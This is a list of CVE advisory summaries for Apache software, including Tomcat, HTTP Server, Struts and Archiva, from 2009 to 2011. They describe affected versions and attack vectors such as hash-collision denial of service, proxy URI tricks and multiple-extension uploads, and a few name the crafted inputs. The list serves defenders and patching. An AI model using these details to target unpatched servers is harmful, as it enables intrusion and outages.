| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
5656| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
5657| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
5658| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
5659| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
